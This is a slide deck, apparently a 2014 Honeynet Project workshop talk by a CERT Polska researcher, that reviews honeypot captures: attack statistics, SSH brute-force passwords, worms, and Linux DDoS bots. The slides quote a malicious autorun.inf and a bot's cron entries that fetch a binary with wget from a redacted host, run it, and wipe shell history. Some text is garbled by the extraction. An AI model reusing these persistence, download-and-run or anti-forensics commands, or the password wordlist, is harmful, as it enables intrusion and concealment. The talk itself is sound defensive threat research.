Caught in the honeypot: (almost) a year in review ukasz Siewierski - - PowerPoint PPT Presentation

caught in the honeypot almost a year in review
SMART_READER_LITE
LIVE PREVIEW

Caught in the honeypot: (almost) a year in review ukasz Siewierski - - PowerPoint PPT Presentation

Caught in the honeypot: (almost) a year in review ukasz Siewierski Polish Chapter / CERT Polska 2014 Honeynet Project Workshop Warsaw, 12th May, 2014 Honeeebox ukasz Siewierski Caught in the honeypot: (almost) a year in review 2 / 11


slide-1
SLIDE 1

Caught in the honeypot: (almost) a year in review

Łukasz Siewierski Polish Chapter / CERT Polska

2014 Honeynet Project Workshop Warsaw, 12th May, 2014

slide-2
SLIDE 2

Honeeebox

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 2 / 11

slide-3
SLIDE 3

Setup

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

slide-4
SLIDE 4

Setup

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

slide-5
SLIDE 5

Setup

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

N

  • w

w i t h S F T P s u p p

  • r

t !

slide-6
SLIDE 6

Setup

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 3 / 11

N

  • w

w i t h S F T P s u p p

  • r

t !

slide-7
SLIDE 7

Statistics (∼1 month): Dionaea samples

Captures 135,981 Distinct URLs 1,475 Unique samples 345 Distinct IPs 1,290

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 4 / 11

slide-8
SLIDE 8

Statistics (∼1 month): Kippo

Unique logins 2,631 Sessions 2,395 Unique ASNs 100 Distinct IPs 272

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 5 / 11

slide-9
SLIDE 9

Statistics (1 month): popular passwords

admin abc123 12345 1234 123 Passw0rd 1q2w3e qwe123 1234567890 root123 1qaz2wsx asdf1234 123qwe!@# 1q2w3e4r5t 123123 root@123 test 123qwe welcome qweasd redhat P@ssw0rd passw0rd password1 admin123 root master 1qaz@WSX 12345678 654321 toor huawei 1234%^&* rootroot root1234 rootpass qwe123!@# q1w2e3r4t5 123456789 1q2w3e4r 123qweasd 142536 root00 password 111 qazwsx p@ssw0rd1 manager 123.com firewall power abcd1234 qazxsw letmein

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 6 / 11

slide-10
SLIDE 10

Samples from Dionaea (Samba)

1 Popular worms: Conficker, Sality, Allaple etc. 2 Some autorun.inf files, e.g.:

[autorun

  • pen=

shell\open\Command=RECYCLER\NTDETECT.EXE D98009DC shell\open\Default=1 shell\explore\Command=RECYCLER\NTDETECT.EXE D98009DC

3 SysInternals PsExec (light-weight telnet replacement) 4 Samples detection rates (VT) are high, about 40-ish out of 50-ish

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 7 / 11

slide-11
SLIDE 11

SSH: DDoS (multiplatform) bots

ELF 32-bit LSB executable, Intel 80386, rarely UPX-packed, rarely stripped (OOD in C++), usually linked statically. Recon (bruteforce SSH) then SFTP (binary/ies + cron file) Gathers all system info and pings back to C&C Wait for DDoS orders (DNS amplification, UDP flood etc.) Automatic updates (via cron!) Persistence achieved via /etc/rcx.d/ script and / or cron

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 8 / 11

slide-12
SLIDE 12

DDoS bot: cron magic

*/1 * * * * killall -9 .IptabLes */1 * * * * cd /var/log > dmesg */1 * * * * echo "unset MAILCHECK" >> /etc/profile */95 * * * * killall -9 ferwfrre */120 * * * * cd /root;rm -rf dir nohup.out */140 * * * * cd /etc; wget http://[xxx]/ferwfrre */96 * * * * nohup /etc/ferwfrre > /dev/null 2>&1& */1 * * * * rm -rf /root/.bash history */1 * * * * touch /root/.bash history */1 * * * * history -r

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 9 / 11

slide-13
SLIDE 13

Do YOU know what attacks your network?

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 10 / 11

slide-14
SLIDE 14

Last slide Thank you for your attention

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 11 / 11

slide-15
SLIDE 15

Źródła

This slides would not be so beautiful without: L

AT

EX and beamer (and many, many other packages), Wikimedia Commons and its pictures, which are available on GPL and Creative Commons licenses,

Łukasz Siewierski Caught in the honeypot: (almost) a year in review 12 / 11